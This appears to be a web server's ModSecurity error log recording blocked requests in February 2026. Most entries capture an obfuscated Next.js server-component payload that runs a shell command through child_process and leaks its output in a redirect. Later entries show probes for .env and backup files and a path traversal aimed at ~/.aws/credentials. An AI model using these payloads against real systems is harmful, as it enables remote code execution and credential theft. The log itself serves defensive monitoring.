"/_next/"] [unique_id "aZoDC_XFy7BeiaQMHVgopAAAABE"] [Sat Feb 21 21:10:03.923048 2026] [:error] [pid 12371:tid 12393] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _gxax=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _qwhw=Buffer.from(_gxax).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_qwhw};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZoDC_XFy7BeiaQMHVgopQAAABQ"] [Sat Feb 21 21:10:03.930581 2026] [:error] [pid 12371:tid 12386] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _jfrd=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _mcsi=Buffer.from(_jfrd).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_mcsi};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZoDC_XFy7BeiaQMHVgopgAAAA0"] [Sat Feb 21 21:10:03.938581 2026] [:error] [pid 12371:tid 12388] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _gvab=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _yfpa=Buffer.from(_gvab).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_yfpa};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZoDC_XFy7BeiaQMHVgopwAAAA8"] [Sat Feb 21 21:10:03.946937 2026] [:error] [pid 12371:tid 12384] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _evpu=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _rhqz=Buffer.from(_evpu).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_rhqz};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZoDC_XFy7BeiaQMHVgoqAAAAAs"] [Sat Feb 21 21:10:03.954819 2026] [:error] [pid 12371:tid 12382] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _xyal=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _wveo=Buffer.from(_xyal).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_wveo};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZoDC_XFy7BeiaQMHVgoqgAAAAk"] [Sat Feb 21 21:10:03.961254 2026] [:error] [pid 12371:tid 12380] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _mjfg=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _wbep=Buffer.from(_mjfg).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_wbep};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZoDC_XFy7BeiaQMHVgoqwAAAAc"] [Sat Feb 21 21:10:03.967228 2026] [:error] [pid 12371:tid 12378] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _jqft=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _zcux=Buffer.from(_jqft).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_zcux};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZoDC_XFy7BeiaQMHVgorAAAAAU"] [Sat Feb 21 21:10:03.975025 2026] [:error] [pid 12371:tid 12395] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _oojj=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _nxhl=Buffer.from(_oojj).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_nxhl};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZoDC_XFy7BeiaQMHVgorQAAABY"] [Sat Feb 21 21:10:03.981023 2026] [:error] [pid 12371:tid 12381] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _recu=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _niea=Buffer.from(_recu).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_niea};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZoDC_XFy7BeiaQMHVgorgAAAAg"] [Sat Feb 21 21:10:03.987281 2026] [:error] [pid 12371:tid 12389] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _mkqz=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _yihc=Buffer.from(_mkqz).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_yihc};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZoDC_XFy7BeiaQMHVgorwAAABA"] [Sat Feb 21 21:10:03.993258 2026] [:error] [pid 12371:tid 12392] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _aide=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _spfd=Buffer.from(_aide).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_spfd};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZoDC_XFy7BeiaQMHVgosAAAABM"] [Sat Feb 21 21:10:03.999311 2026] [:error] [pid 12371:tid 12396] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _lhgl=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ljfp=Buffer.from(_lhgl).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ljfp};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZoDC_XFy7BeiaQMHVgosQAAABc"] [Sun Feb 22 13:37:57.087319 2026] [:error] [pid 13514:tid 13576] [client 4.193.219.127:18414] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Tue Feb 24 18:26:47.501036 2026] [:error] [pid 10294:tid 10390] [client 185.177.72.22:32544] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/env.bak"] [unique_id "aZ3RRzuzcxjz9L27429BFAAAARg"] [Tue Feb 24 18:26:47.559563 2026] [:error] [pid 24013:tid 24038] [client 185.177.72.22:32558] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.bak"] [unique_id "aZ3RR1ula2tjaLQkqxIk8wAAANc"] [Tue Feb 24 18:26:48.311703 2026] [:error] [pid 10294:tid 10387] [client 185.177.72.22:32610] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "www.cms-1.dev-unit.com"] [uri "/pms"] [unique_id "aZ3RSDuzcxjz9L27429BJAAAARU"] [Tue Feb 24 18:26:48.444796 2026] [:error] [pid 23860:tid 23908] [client 185.177.72.22:32622] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /pms?module=logging&file_name=../../../../../../~/.aws/credentials&number_of_lines=10000"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "cms-1.dev-unit.com"] [uri "/pms"] [unique_id "aZ3RSJBWPCzoVu8DXHacxQAAAAs"] [Tue Feb 24 18:27:24.827365 2026] [access_compat:error] [pid 10294:tid 10367] [client 185.177.72.22:22606] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Tue Feb 24 18:27:25.001158 2026] [access_compat:error] [pid 23860:tid 23906] [client 185.177.72.22:22626] AH01797: client denied by server configuration: /home/id/cms-1.dev-unit.com/core/.env [Tue Feb 24 18:27:27.839613 2026] [:error] [pid 10294:tid 10384] [client 185.177.72.22:23148] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/config/settings.ini"] [unique_id "aZ3Rbzuzcxjz9L27429EUAAAARM"] [Tue Feb 24 18:27:27.980409 2026] [:error] [pid 10294:tid 10386] [client 185.177.72.22:23162] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/config/settings.ini"] [unique_id "aZ3Rbzuzcxjz9L27429EWQAAARQ"] [Tue Feb 24 18:27:34.729668 2026] [:error] [pid 24013:tid 24018] [client 185.177.72.22:23480] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "www.cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aZ3Rdlula2tjaLQkqxInfQAAAMM"] [Tue Feb 24 18:27:35.359698 2026] [:error] [pid 10294:tid 10364] [client 185.177.72.22:54142] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "cms-1.dev-unit.com"] [uri "/env.backup"] [unique_id "aZ3Rdzuzcxjz9L27429FUQAAAQU"] [Tue Feb 24 18:27:43.726492 2026] [:error] [pid 10294:tid 10365] [client 185.177.72.22:54598] [client 185.177.72.22] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] 